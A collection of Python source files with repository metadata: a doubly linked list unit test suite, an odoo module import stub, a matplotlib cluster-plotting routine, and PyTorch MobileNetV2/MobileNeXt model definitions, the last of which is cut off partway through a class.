421a640fce40664e6ed3ad534d67e313c603bdf4
| 9,369
|
py
|
Python
|
test/doublylinkedlist_test.py
|
ruyadorno/simple-data-structures
|
28d6aeebb6d909fe64a327c3ec1c39526d35a173
|
[
"MIT"
] | 2
|
2017-09-29T10:01:32.000Z
|
2022-02-20T01:02:38.000Z
|
test/doublylinkedlist_test.py
|
ruyadorno/simple-data-structures
|
28d6aeebb6d909fe64a327c3ec1c39526d35a173
|
[
"MIT"
] | 1
|
2017-02-28T14:27:46.000Z
|
2020-04-17T16:34:53.000Z
|
test/doublylinkedlist_test.py
|
ruyadorno/simple-data-structures
|
28d6aeebb6d909fe64a327c3ec1c39526d35a173
|
[
"MIT"
] | 1
|
2022-02-20T01:02:39.000Z
|
2022-02-20T01:02:39.000Z
|
import unittest
from doublylinkedlist import DoublyLinkedList, DoublyLinkedListNode, DoublyLinkedListError
class TestDoublyLinkedList(unittest.TestCase):
def test_create_new_linked_list(self):
dl_list = DoublyLinkedList()
self.assertIsInstance(dl_list, DoublyLinkedList)
def test_create_new_linked_list_from_list(self):
dl_list = DoublyLinkedList([1, 2, 3])
self.assertIsInstance(dl_list, DoublyLinkedList)
self.assertEqual(dl_list.firstnode().value, 1)
self.assertEqual(dl_list.lastnode().value, 3)
def test_create_new_linked_list_one_elem(self):
dl_list = DoublyLinkedList([1])
self.assertEqual(dl_list.firstnode().value, 1)
self.assertEqual(dl_list.lastnode().value, 1)
def test_sentinel_nodes_should_not_be_listed(self):
dl_list = DoublyLinkedList([1])
self.assertEqual(dl_list.firstnode().next(), None)
self.assertEqual(dl_list.firstnode().prev(), None)
def test_firstnode_on_empty_list(self):
dl_list = DoublyLinkedList()
self.assertEqual(dl_list.firstnode(), None)
def test_lastnode_on_empty_list(self):
dl_list = DoublyLinkedList()
self.assertEqual(dl_list.lastnode(), None)
def test_items_iterator(self):
dl_list = DoublyLinkedList([1, 2, 3])
count = 0
for i in dl_list.items():
self.assertIsInstance(i, DoublyLinkedListNode)
self.assertGreater(i.value, 0)
count += 1
self.assertEqual(count, 3)
def test_insert_before(self):
dl_list = DoublyLinkedList([1, 2, 3])
self.assertEqual(len([i for i in dl_list.items()]), 3)
dl_list.insertBefore(4, dl_list.lastnode().prev())
self.assertEqual(dl_list.lastnode().prev().prev().value, 4)
self.assertEqual(len([i for i in dl_list.items()]), 4)
def test_insert_before_first_item(self):
dl_list = DoublyLinkedList([1, 2, 3])
self.assertEqual(len([i for i in dl_list.items()]), 3)
dl_list.insertBefore(4, dl_list.firstnode())
self.assertEqual(dl_list.firstnode().value, 4)
self.assertEqual(len([i for i in dl_list.items()]), 4)
def test_insert_after(self):
dl_list = DoublyLinkedList([1, 2, 3])
self.assertEqual(len([i for i in dl_list.items()]), 3)
dl_list.insertAfter(4, dl_list.firstnode())
self.assertEqual(dl_list.firstnode().next().value, 4)
self.assertEqual(len([i for i in dl_list.items()]), 4)
def test_insert_after_last_item(self):
dl_list = DoublyLinkedList([1, 2, 3])
self.assertEqual(len([i for i in dl_list.items()]), 3)
dl_list.insertAfter(4, dl_list.lastnode())
self.assertEqual(dl_list.lastnode().value, 4)
self.assertEqual(len([i for i in dl_list.items()]), 4)
def test_remove_node(self):
dl_list = DoublyLinkedList([1, 2, 3])
self.assertEqual(len([i for i in dl_list.items()]), 3)
dl_list.removeNode(dl_list.lastnode().prev())
self.assertEqual(dl_list.lastnode().prev().value, 1)
self.assertEqual(len([i for i in dl_list.items()]), 2)
def test_remove_node_unique_item(self):
dl_list = DoublyLinkedList([1])
self.assertEqual(len([i for i in dl_list.items()]), 1)
dl_list.removeNode(dl_list.firstnode())
self.assertEqual(dl_list.firstnode(), None)
self.assertEqual(len([i for i in dl_list.items()]), 0)
def test_remove_node_first_item(self):
dl_list = DoublyLinkedList([1, 2, 3])
self.assertEqual(len([i for i in dl_list.items()]), 3)
dl_list.removeNode(dl_list.firstnode())
self.assertEqual(dl_list.firstnode().value, 2)
self.assertEqual(len([i for i in dl_list.items()]), 2)
def test_remove_node_last_item(self):
dl_list = DoublyLinkedList([1, 2, 3])
self.assertEqual(len([i for i in dl_list.items()]), 3)
dl_list.removeNode(dl_list.lastnode())
self.assertEqual(dl_list.lastnode().value, 2)
self.assertEqual(len([i for i in dl_list.items()]), 2)
def test_remove_before(self):
dl_list = DoublyLinkedList([1, 2, 3])
self.assertEqual(len([i for i in dl_list.items()]), 3)
dl_list.removeBeforeNode(dl_list.lastnode())
self.assertEqual(dl_list.lastnode().prev().value, 1)
self.assertEqual(len([i for i in dl_list.items()]), 2)
def test_remove_before_first_item(self):
dl_list = DoublyLinkedList([1, 2, 3])
with self.assertRaises(DoublyLinkedListError):
dl_list.removeBeforeNode(dl_list.firstnode())
def test_remove_after(self):
dl_list = DoublyLinkedList([1, 2, 3])
self.assertEqual(len([i for i in dl_list.items()]), 3)
dl_list.removeAfterNode(dl_list.firstnode())
self.assertEqual(dl_list.firstnode().next().value, 3)
self.assertEqual(len([i for i in dl_list.items()]), 2)
def test_remove_after_first_item(self):
dl_list = DoublyLinkedList([1, 2, 3])
with self.assertRaises(DoublyLinkedListError):
dl_list.removeAfterNode(dl_list.lastnode())
def test_remove_all_in_between(self):
dl_list = DoublyLinkedList([1, 2, 3, 4, 5, 6])
self.assertEqual(len([i for i in dl_list.items()]), 6)
new_list = dl_list.removeAllInBetween(\
dl_list.firstnode().next(), dl_list.lastnode().prev())
self.assertEqual(len([i for i in dl_list.items()]), 4)
self.assertEqual(len([i for i in new_list.items()]), 2)
self.assertEqual(new_list.firstnode().value, 3)
def test_remove_all_in_between_single_item(self):
dl_list = DoublyLinkedList([1, 2, 3, 4, 5, 6])
self.assertEqual(len([i for i in dl_list.items()]), 6)
new_list = dl_list.removeAllInBetween(\
dl_list.firstnode(), dl_list.firstnode().next().next())
self.assertEqual(len([i for i in dl_list.items()]), 5)
self.assertEqual(len([i for i in new_list.items()]), 1)
self.assertEqual(new_list.firstnode().value, 2)
def test_remove_all_in_between_empty(self):
dl_list = DoublyLinkedList([1, 2, 3])
self.assertEqual(len([i for i in dl_list.items()]), 3)
new_list = dl_list.removeAllInBetween(\
dl_list.firstnode(), dl_list.firstnode().next())
self.assertEqual(len([i for i in dl_list.items()]), 3)
self.assertEqual(len([i for i in new_list.items()]), 0)
self.assertEqual(new_list.firstnode(), None)
def test_insert_first_node(self):
dl_list = DoublyLinkedList([1, 2, 3])
self.assertEqual(len([i for i in dl_list.items()]), 3)
dl_list.insertFirstNode(4)
self.assertEqual(dl_list.firstnode().value, 4)
self.assertEqual(len([i for i in dl_list.items()]), 4)
def test_insert_first_node_empty_list(self):
dl_list = DoublyLinkedList()
self.assertEqual(len([i for i in dl_list.items()]), 0)
dl_list.insertFirstNode(1)
self.assertEqual(dl_list.firstnode().value, 1)
self.assertEqual(len([i for i in dl_list.items()]), 1)
def test_insert_last_node(self):
dl_list = DoublyLinkedList([1, 2, 3])
self.assertEqual(len([i for i in dl_list.items()]), 3)
dl_list.insertLastNode(4)
self.assertEqual(dl_list.lastnode().value, 4)
self.assertEqual(len([i for i in dl_list.items()]), 4)
def test_insert_last_node_empty_list(self):
dl_list = DoublyLinkedList()
self.assertEqual(len([i for i in dl_list.items()]), 0)
dl_list.insertLastNode(1)
self.assertEqual(dl_list.lastnode().value, 1)
self.assertEqual(len([i for i in dl_list.items()]), 1)
def test_remove_first_node(self):
dl_list = DoublyLinkedList([1, 2, 3])
self.assertEqual(len([i for i in dl_list.items()]), 3)
self.assertEqual(dl_list.removeFirstNode().value, 1)
self.assertEqual(len([i for i in dl_list.items()]), 2)
def test_remove_first_node_single_item(self):
dl_list = DoublyLinkedList([1])
self.assertEqual(len([i for i in dl_list.items()]), 1)
self.assertEqual(dl_list.removeFirstNode().value, 1)
self.assertEqual(len([i for i in dl_list.items()]), 0)
def test_remove_first_node_empty_list(self):
dl_list = DoublyLinkedList()
self.assertEqual(len([i for i in dl_list.items()]), 0)
self.assertEqual(dl_list.removeFirstNode(), None)
self.assertEqual(len([i for i in dl_list.items()]), 0)
def test_remove_last_node(self):
dl_list = DoublyLinkedList([1, 2, 3])
self.assertEqual(len([i for i in dl_list.items()]), 3)
self.assertEqual(dl_list.removeLastNode().value, 3)
self.assertEqual(len([i for i in dl_list.items()]), 2)
def test_remove_last_node_single_item(self):
dl_list = DoublyLinkedList([1])
self.assertEqual(len([i for i in dl_list.items()]), 1)
self.assertEqual(dl_list.removeLastNode().value, 1)
self.assertEqual(len([i for i in dl_list.items()]), 0)
def test_remove_last_node_empty_list(self):
dl_list = DoublyLinkedList()
self.assertEqual(len([i for i in dl_list.items()]), 0)
self.assertEqual(dl_list.removeLastNode(), None)
self.assertEqual(len([i for i in dl_list.items()]), 0)
| 43.780374
| 90
| 0.652578
| 1,331
| 9,369
| 4.381668
| 0.055597
| 0.150206
| 0.05144
| 0.159636
| 0.91701
| 0.86917
| 0.813272
| 0.80727
| 0.787894
| 0.780007
| 0
| 0.020969
| 0.211015
| 9,369
| 213
| 91
| 43.985915
| 0.767992
| 0
| 0
| 0.564246
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.486034
| 1
| 0.178771
| false
| 0
| 0.011173
| 0
| 0.195531
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
429bd00baf3ef49a96893b9200b61be3510c533c
| 121
|
py
|
Python
|
odoo-13.0/addons/base_import_module/models/__init__.py
|
VaibhavBhujade/Blockchain-ERP-interoperability
|
b5190a037fb6615386f7cbad024d51b0abd4ba03
|
[
"MIT"
] | null | null | null |
odoo-13.0/addons/base_import_module/models/__init__.py
|
VaibhavBhujade/Blockchain-ERP-interoperability
|
b5190a037fb6615386f7cbad024d51b0abd4ba03
|
[
"MIT"
] | null | null | null |
odoo-13.0/addons/base_import_module/models/__init__.py
|
VaibhavBhujade/Blockchain-ERP-interoperability
|
b5190a037fb6615386f7cbad024d51b0abd4ba03
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# flake8: noqa
from . import base_import_module
from . import ir_module
from . import ir_ui_view
| 20.166667
| 32
| 0.719008
| 19
| 121
| 4.315789
| 0.631579
| 0.365854
| 0.390244
| 0.439024
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.019802
| 0.165289
| 121
| 5
| 33
| 24.2
| 0.792079
| 0.280992
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
35eec08215d3d083527a356bb3fa7e82708262a1
| 4,978
|
py
|
Python
|
acorns/plotting.py
|
jdhenshaw/leodis
|
9c018d69102e15f0387aa9449944fa90f20c5a0d
|
[
"MIT"
] | 3
|
2020-04-06T12:11:21.000Z
|
2022-01-07T07:52:21.000Z
|
acorns/plotting.py
|
jdhenshaw/leodis
|
9c018d69102e15f0387aa9449944fa90f20c5a0d
|
[
"MIT"
] | null | null | null |
acorns/plotting.py
|
jdhenshaw/leodis
|
9c018d69102e15f0387aa9449944fa90f20c5a0d
|
[
"MIT"
] | 1
|
2019-10-30T15:37:17.000Z
|
2019-10-30T15:37:17.000Z
|
# Licensed under an MIT open source license - see LICENSE
"""
acorns - Agglomerative Clustering for ORgansing Nested Structures
Copyright (c) 2017 Jonathan D. Henshaw
CONTACT: j.d.henshaw@ljmu.ac.uk
"""
import matplotlib
import matplotlib.pyplot as plt
from matplotlib.pyplot import cm
from mpl_toolkits.mplot3d import Axes3D
from matplotlib import colors
def plot_scatter(self):
fig = plt.figure(figsize=( 8.0, 8.0))
if self.method == 0:
ax = fig.add_subplot(111)
ax.set_xlabel('X')
ax.set_ylabel('Y')
ax.scatter(self.data[0,:], self.data[1,:], marker='o', s=2., c='black',linewidth=0., alpha=0.2)
count=0.0
_antecessors = []
for cluster in self.clusters:
if self.clusters[cluster] == self.clusters[cluster].antecessor:
_antecessors.append(self.clusters[cluster].antecessor)
count+=1.0
colour=iter(cm.rainbow(np.linspace(0,1,count)))
for ant in _antecessors:
c=next(colour)
if ant.leaf_cluster:
ax.scatter(ant.cluster_members[0,:], ant.cluster_members[1,:], \
marker='o', s=3., c='black',linewidth=0, alpha=0.7)
ax.scatter(ant.cluster_members[0,:], ant.cluster_members[1,:], ant.cluster_members[4,:], \
marker='o', s=10., c='None', edgecolors = c ,alpha=0.9, depthshade=False, linewidth = 0.8)
else:
ax.scatter(ant.cluster_members[0,:], ant.cluster_members[1,:], \
marker='o', s=3., c='black',linewidth=0, alpha=0.7)
ax.scatter(ant.cluster_members[0,:], ant.cluster_members[1,:], \
marker='o', s=10., c='None', edgecolors = c ,alpha=0.9, depthshade=False, linewidth = 0.8)
plt.draw()
plt.show()
if self.method == 1:
ax = fig.add_subplot(111, projection='3d')
ax.set_xlabel('X')
ax.set_ylabel('Y')
ax.set_zlabel('Z')
ax.scatter(self.data[0,:], self.data[1,:], self.data[4,:], marker='o', s=2., c='black',linewidth=0., alpha=0.2)
count=0.0
_antecessors = []
for cluster in self.clusters:
if self.clusters[cluster] == self.clusters[cluster].antecessor:
_antecessors.append(self.clusters[cluster].antecessor)
count+=1.0
colour=iter(cm.rainbow(np.linspace(0,1,count)))
for ant in _antecessors:
c=next(colour)
if ant.leaf_cluster:
ax.scatter(ant.cluster_members[0,:], ant.cluster_members[1,:], ant.cluster_members[4,:], \
marker='o', s=3., c='black',linewidth=0, alpha=0.7)
ax.scatter(ant.cluster_members[0,:], ant.cluster_members[1,:], ant.cluster_members[4,:], \
marker='o', s=10., c='None', edgecolors = c ,alpha=0.9, depthshade=False, linewidth = 0.8)
else:
ax.scatter(ant.cluster_members[0,:], ant.cluster_members[1,:], ant.cluster_members[4,:], \
marker='o', s=3., c='black',linewidth=0, alpha=0.7)
ax.scatter(ant.cluster_members[0,:], ant.cluster_members[1,:], ant.cluster_members[4,:], \
marker='o', s=10., c='None', edgecolors = c ,alpha=0.9, depthshade=False, linewidth = 0.8)
plt.draw()
plt.show()
if self.method==2:
ax = fig.add_subplot(111, projection='3d')
ax.set_xlabel('X')
ax.set_ylabel('Y')
ax.set_zlabel('Z')
ax.scatter(self.data[0,:], self.data[1,:], self.data[2,:], marker='o', s=2., c='black',linewidth=0., alpha=0.2)
count=0.0
_antecessors = []
for cluster in self.clusters:
if self.clusters[cluster] == self.clusters[cluster].antecessor:
_antecessors.append(self.clusters[cluster].antecessor)
count+=1.0
colour=iter(cm.rainbow(np.linspace(0,1,count)))
for ant in _antecessors:
c=next(colour)
if ant.leaf_cluster:
ax.scatter(ant.cluster_members[0,:], ant.cluster_members[1,:], ant.cluster_members[2,:], \
marker='o', s=3., c='black',linewidth=0, alpha=0.7)
ax.scatter(ant.cluster_members[0,:], ant.cluster_members[1,:], ant.cluster_members[2,:], \
marker='o', s=10., c='None', edgecolors = c ,alpha=0.9, depthshade=False, linewidth = 0.8)
else:
ax.scatter(ant.cluster_members[0,:], ant.cluster_members[1,:], ant.cluster_members[2,:], \
marker='o', s=3., c='black',linewidth=0, alpha=0.7)
ax.scatter(ant.cluster_members[0,:], ant.cluster_members[1,:], ant.cluster_members[2,:], \
marker='o', s=10., c='None', edgecolors = c ,alpha=0.9, depthshade=False, linewidth = 0.8)
plt.draw()
plt.show()
| 45.254545
| 119
| 0.557855
| 660
| 4,978
| 4.119697
| 0.15
| 0.121368
| 0.206326
| 0.083854
| 0.873115
| 0.866495
| 0.866495
| 0.866495
| 0.8573
| 0.847738
| 0
| 0.043091
| 0.277421
| 4,978
| 109
| 120
| 45.669725
| 0.712816
| 0.038771
| 0
| 0.83908
| 0
| 0
| 0.020096
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.011494
| false
| 0
| 0.057471
| 0
| 0.068966
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
c401717d01596c47e1ecc86c08755daba143cae7
| 21,857
|
py
|
Python
|
mobilenet.py
|
QFaceblue/Driving-Behavior-Recognition
|
98c8fab51c7074852598ea9119f472ed7b1bda13
|
[
"Apache-2.0"
] | 1
|
2022-03-13T14:37:17.000Z
|
2022-03-13T14:37:17.000Z
|
mobilenet.py
|
QFaceblue/Driving-Behavior-Recognition
|
98c8fab51c7074852598ea9119f472ed7b1bda13
|
[
"Apache-2.0"
] | null | null | null |
mobilenet.py
|
QFaceblue/Driving-Behavior-Recognition
|
98c8fab51c7074852598ea9119f472ed7b1bda13
|
[
"Apache-2.0"
] | null | null | null |
from torch import nn
__all__ = ['MobileNetV2']
def _make_divisible(v, divisor, min_value=None):
"""
This function is taken from the original tf repo.
It ensures that all layers have a channel number that is divisible by 8
It can be seen here:
https://github.com/tensorflow/models/blob/master/research/slim/nets/mobilenet/mobilenet.py
:param v:
:param divisor:
:param min_value:
:return:
"""
if min_value is None:
min_value = divisor
new_v = max(min_value, int(v + divisor / 2) // divisor * divisor)
# Make sure that round down does not go down by more than 10%.
if new_v < 0.9 * v:
new_v += divisor
return new_v
class ConvBNReLU(nn.Sequential):
def __init__(self, in_planes, out_planes, kernel_size=3, stride=1, groups=1, norm_layer=None):
padding = (kernel_size - 1) // 2
if norm_layer is None:
norm_layer = nn.BatchNorm2d
super(ConvBNReLU, self).__init__(
nn.Conv2d(in_planes, out_planes, kernel_size, stride, padding, groups=groups, bias=False),
norm_layer(out_planes),
nn.ReLU6(inplace=True)
)
class InvertedResidual(nn.Module):
def __init__(self, inp, oup, stride, expand_ratio, norm_layer=None):
super(InvertedResidual, self).__init__()
self.stride = stride
assert stride in [1, 2]
if norm_layer is None:
norm_layer = nn.BatchNorm2d
hidden_dim = int(round(inp * expand_ratio))
self.use_res_connect = self.stride == 1 and inp == oup
layers = []
if expand_ratio != 1:
# pw
layers.append(ConvBNReLU(inp, hidden_dim, kernel_size=1, norm_layer=norm_layer))
layers.extend([
# dw
ConvBNReLU(hidden_dim, hidden_dim, stride=stride, groups=hidden_dim, norm_layer=norm_layer),
# pw-linear
nn.Conv2d(hidden_dim, oup, 1, 1, 0, bias=False),
norm_layer(oup),
])
self.conv = nn.Sequential(*layers)
def forward(self, x):
if self.use_res_connect:
return x + self.conv(x)
else:
return self.conv(x)
class Sandglass(nn.Module):
def __init__(self, inp, oup, stride, reduce_ratio, norm_layer=None):
super(Sandglass, self).__init__()
self.stride = stride
assert stride in [1, 2]
if norm_layer is None:
norm_layer = nn.BatchNorm2d
hidden_dim = int(round(inp / reduce_ratio))
self.use_res_connect = self.stride == 1 and inp == oup
layers = []
layers.extend([
# dw
ConvBNReLU(inp, inp, stride=1, groups=inp, norm_layer=norm_layer),
# pw-linear
nn.Conv2d(inp, hidden_dim, 1, 1, 0, bias=False),
norm_layer(hidden_dim),
# pw-relu6
nn.Conv2d(hidden_dim, oup, 1, 1, 0, bias=False),
norm_layer(oup),
nn.ReLU6(inplace=True),
# dw-liner
nn.Conv2d(oup, oup, 3, stride, 1, groups=oup, bias=False),
norm_layer(oup),
])
self.conv = nn.Sequential(*layers)
def forward(self, x):
if self.use_res_connect:
return x + self.conv(x)
else:
return self.conv(x)
class My_Sandglass(nn.Module):
def __init__(self, inp, oup, stride, reduce_ratio, norm_layer=None):
super(My_Sandglass, self).__init__()
self.stride = stride
assert stride in [1, 2]
if norm_layer is None:
norm_layer = nn.BatchNorm2d
self.act = nn.ReLU6(inplace=True)
hidden_dim = int(round(inp / reduce_ratio))
self.use_res_connect = self.stride == 1 and inp == oup
self.dw1 = nn.Conv2d(inp, inp, 3, 1, 1, groups=inp, bias=False)
self.bn1 = norm_layer(inp)
self.avg_pool = nn.AdaptiveAvgPool2d(1)
self.fc = nn.Linear(inp, hidden_dim)
self.pw1 = nn.Conv2d(inp, hidden_dim, 1, 1, 0, bias=False)
self.bn2 = norm_layer(hidden_dim)
self.pw2 = nn.Conv2d(hidden_dim, oup, 1, 1, 0, bias=False)
self.bn3 = norm_layer(oup)
self.dw2 = nn.Conv2d(oup, oup, 3, stride, 1, groups=oup, bias=False)
self.bn4 = norm_layer(oup)
def forward(self, x):
y = self.dw1(x)
b, c, _, _ = y.size()
z = self.avg_pool(y).view(b, c)
z = self.fc(z).view(b, -1, 1, 1)
z = torch.clamp(z, 0, 1)
y = self.bn1(y)
y = self.act(y)
y = self.pw1(y)
y = self.bn2(y)
y = y * z
y = self.pw2(y)
y = self.bn3(y)
y = self.act(y)
y = self. dw2(y)
y = self.bn4(y)
if self.use_res_connect:
return x + y
else:
return y
def hard_sigmoid(x, inplace: bool = False):
if inplace:
return x.add_(3.).clamp_(0., 6.).div_(6.)
else:
return F.relu6(x + 3.) / 6.
class My_Sandglass_2(nn.Module):
def __init__(self, inp, oup, stride, reduce_ratio, norm_layer=None):
super(My_Sandglass_2, self).__init__()
self.stride = stride
assert stride in [1, 2]
if norm_layer is None:
norm_layer = nn.BatchNorm2d
self.act = nn.ReLU6(inplace=True)
hidden_dim = int(round(inp / reduce_ratio))
self.use_res_connect = self.stride == 1 and inp == oup
self.dw1 = nn.Conv2d(inp, inp, 3, 1, 1, groups=inp, bias=False)
self.bn1 = norm_layer(inp)
self.avg_pool = nn.AdaptiveAvgPool2d(1)
self.fc = nn.Linear(inp, hidden_dim)
self.pw1 = nn.Conv2d(inp, hidden_dim, 1, 1, 0, bias=False)
self.bn2 = norm_layer(hidden_dim)
self.pw2 = nn.Conv2d(hidden_dim, oup, 1, 1, 0, bias=False)
self.bn3 = norm_layer(oup)
self.dw2 = nn.Conv2d(oup, oup, 3, stride, 1, groups=oup, bias=False)
self.bn4 = norm_layer(oup)
def forward(self, x):
y = self.dw1(x)
b, c, _, _ = y.size()
z = self.avg_pool(y).view(b, c)
z = self.fc(z).view(b, -1, 1, 1)
# z = torch.clamp(z, 0, 1)
z = hard_sigmoid(z, inplace=True)
y = self.bn1(y)
y = self.act(y)
y = self.pw1(y)
y = self.bn2(y)
y = y * z
y = self.pw2(y)
y = self.bn3(y)
y = self.act(y)
y = self. dw2(y)
y = self.bn4(y)
if self.use_res_connect:
return x + y
else:
return y
class SELayer(nn.Module):
def __init__(self, channel, reduction=4):
super(SELayer, self).__init__()
self.avg_pool = nn.AdaptiveAvgPool2d(1)
self.fc = nn.Sequential(
nn.Linear(channel, channel // reduction),
nn.ReLU(inplace=True),
nn.Linear(channel // reduction, channel))
def forward(self, x):
b, c, _, _ = x.size()
y = self.avg_pool(x).view(b, c)
y = self.fc(y).view(b, c, 1, 1)
y = torch.clamp(y, 0, 1)
return x * y
class MobileNetV2(nn.Module):
def __init__(self,
num_classes=1000,
width_mult=1.0,
inverted_residual_setting=None,
round_nearest=8,
block=None,
norm_layer=None):
"""
MobileNet V2 main class
Args:
num_classes (int): Number of classes
width_mult (float): Width multiplier - adjusts number of channels in each layer by this amount
inverted_residual_setting: Network structure
round_nearest (int): Round the number of channels in each layer to be a multiple of this number
Set to 1 to turn off rounding
block: Module specifying inverted residual building block for mobilenetv2
norm_layer: Module specifying the normalization layer to use
"""
super(MobileNetV2, self).__init__()
if block is None:
block = InvertedResidual
if norm_layer is None:
norm_layer = nn.BatchNorm2d
input_channel = 32
last_channel = 1280
if inverted_residual_setting is None:
inverted_residual_setting = [
# t, c, n, s
[1, 16, 1, 1],
[6, 24, 2, 2],
[6, 32, 3, 2],
[6, 64, 4, 2],
[6, 96, 3, 1],
[6, 160, 3, 2],
[6, 320, 1, 1],
]
# only check the first element, assuming user knows t,c,n,s are required
if len(inverted_residual_setting) == 0 or len(inverted_residual_setting[0]) != 4:
raise ValueError("inverted_residual_setting should be non-empty "
"or a 4-element list, got {}".format(inverted_residual_setting))
# building first layer
input_channel = _make_divisible(input_channel * width_mult, round_nearest)
self.last_channel = _make_divisible(last_channel * max(1.0, width_mult), round_nearest)
features = [ConvBNReLU(3, input_channel, stride=2, norm_layer=norm_layer)]
# building inverted residual blocks
for t, c, n, s in inverted_residual_setting:
output_channel = _make_divisible(c * width_mult, round_nearest)
for i in range(n):
stride = s if i == 0 else 1
features.append(block(input_channel, output_channel, stride, t, norm_layer=norm_layer))
input_channel = output_channel
# building last several layers
features.append(ConvBNReLU(input_channel, self.last_channel, kernel_size=1, norm_layer=norm_layer))
# make it nn.Sequential
self.features = nn.Sequential(*features)
# building classifier
self.classifier = nn.Sequential(
nn.Dropout(0.2),
# nn.Linear(self.last_channel, num_classes),
nn.Linear(output_channel, num_classes),
)
# weight initialization
for m in self.modules():
if isinstance(m, nn.Conv2d):
nn.init.kaiming_normal_(m.weight, mode='fan_out')
if m.bias is not None:
nn.init.zeros_(m.bias)
elif isinstance(m, (nn.BatchNorm2d, nn.GroupNorm)):
nn.init.ones_(m.weight)
nn.init.zeros_(m.bias)
elif isinstance(m, nn.Linear):
nn.init.normal_(m.weight, 0, 0.01)
nn.init.zeros_(m.bias)
def _forward_impl(self, x):
# This exists since TorchScript doesn't support inheritance, so the superclass method
# (this one) needs to have a name other than `forward` that can be accessed in a subclass
x = self.features(x)
# Cannot use "squeeze" as batch-size can be 1 => must use reshape with x.shape[0]
x = nn.functional.adaptive_avg_pool2d(x, 1).reshape(x.shape[0], -1)
x = self.classifier(x)
return x
def forward(self, x):
return self._forward_impl(x)
class MobileNetV2_sandglass(nn.Module):
def __init__(self,
num_classes=1000,
width_mult=1.0,
inverted_residual_setting=None,
round_nearest=8,
block=None,
norm_layer=None):
"""
MobileNet V2 main class
Args:
num_classes (int): Number of classes
width_mult (float): Width multiplier - adjusts number of channels in each layer by this amount
inverted_residual_setting: Network structure
round_nearest (int): Round the number of channels in each layer to be a multiple of this number
Set to 1 to turn off rounding
block: Module specifying inverted residual building block for mobilenetv2
norm_layer: Module specifying the normalization layer to use
"""
super(MobileNetV2_sandglass, self).__init__()
if block is None:
block = Sandglass
if norm_layer is None:
norm_layer = nn.BatchNorm2d
input_channel = 32
last_channel = 1280
if inverted_residual_setting is None:
inverted_residual_setting = [
# t, c, n, s
[1, 16, 1, 1],
[6, 24, 2, 2],
[6, 32, 3, 2],
[6, 64, 4, 2],
[6, 96, 3, 1],
[6, 160, 3, 2],
# [6, 320, 1, 1],
]
# only check the first element, assuming user knows t,c,n,s are required
if len(inverted_residual_setting) == 0 or len(inverted_residual_setting[0]) != 4:
raise ValueError("inverted_residual_setting should be non-empty "
"or a 4-element list, got {}".format(inverted_residual_setting))
# building first layer
input_channel = _make_divisible(input_channel * width_mult, round_nearest)
self.last_channel = _make_divisible(last_channel * max(1.0, width_mult), round_nearest)
features = [ConvBNReLU(3, input_channel, stride=2, norm_layer=norm_layer)]
# building inverted residual blocks
for t, c, n, s in inverted_residual_setting:
output_channel = _make_divisible(c * t * width_mult, round_nearest)
for i in range(n):
stride = s if i == 0 else 1
features.append(block(input_channel, output_channel, stride, t, norm_layer=norm_layer))
input_channel = output_channel
features.extend(
[ConvBNReLU(960, 960, stride=1, groups=960, norm_layer=norm_layer),
# pw-linear
nn.Conv2d(960, 320, 1, 1, 0, bias=False),
norm_layer(320),]
)
# building last several layers
features.append(ConvBNReLU(input_channel, self.last_channel, kernel_size=1, norm_layer=norm_layer))
# make it nn.Sequential
self.features = nn.Sequential(*features)
# building classifier
self.classifier = nn.Sequential(
nn.Dropout(0.2),
nn.Linear(self.last_channel, num_classes),
)
# weight initialization
for m in self.modules():
if isinstance(m, nn.Conv2d):
nn.init.kaiming_normal_(m.weight, mode='fan_out')
if m.bias is not None:
nn.init.zeros_(m.bias)
elif isinstance(m, (nn.BatchNorm2d, nn.GroupNorm)):
nn.init.ones_(m.weight)
nn.init.zeros_(m.bias)
elif isinstance(m, nn.Linear):
nn.init.normal_(m.weight, 0, 0.01)
nn.init.zeros_(m.bias)
def _forward_impl(self, x):
# This exists since TorchScript doesn't support inheritance, so the superclass method
# (this one) needs to have a name other than `forward` that can be accessed in a subclass
x = self.features(x)
# Cannot use "squeeze" as batch-size can be 1 => must use reshape with x.shape[0]
x = nn.functional.adaptive_avg_pool2d(x, 1).reshape(x.shape[0], -1)
x = self.classifier(x)
return x
def forward(self, x):
return self._forward_impl(x)
class MobileNeXt(nn.Module):
def __init__(self,
num_classes=1000,
width_mult=1.0,
sandglass_setting=None,
round_nearest=8,
block=None,
norm_layer=None):
"""
MobileNet V2 main class
Args:
num_classes (int): Number of classes
width_mult (float): Width multiplier - adjusts number of channels in each layer by this amount
sandglass_setting: Network structure
round_nearest (int): Round the number of channels in each layer to be a multiple of this number
Set to 1 to turn off rounding
block: Module specifying inverted residual building block for mobilenetv2
norm_layer: Module specifying the normalization layer to use
"""
super(MobileNeXt, self).__init__()
if block is None:
block = Sandglass
if norm_layer is None:
norm_layer = nn.BatchNorm2d
input_channel = 32
last_channel = 1280
if sandglass_setting is None:
sandglass_setting = [
# t, c, n, s
[2, 96, 1, 2],
[6, 144, 1, 1],
[6, 192, 3, 2],
[6, 288, 3, 2],
[6, 384, 4, 1],
[6, 576, 4, 2],
[6, 960, 3, 1],# [6, 960, 2, 1],
[6, 1280, 1, 1],
]
# only check the first element, assuming user knows t,c,n,s are required
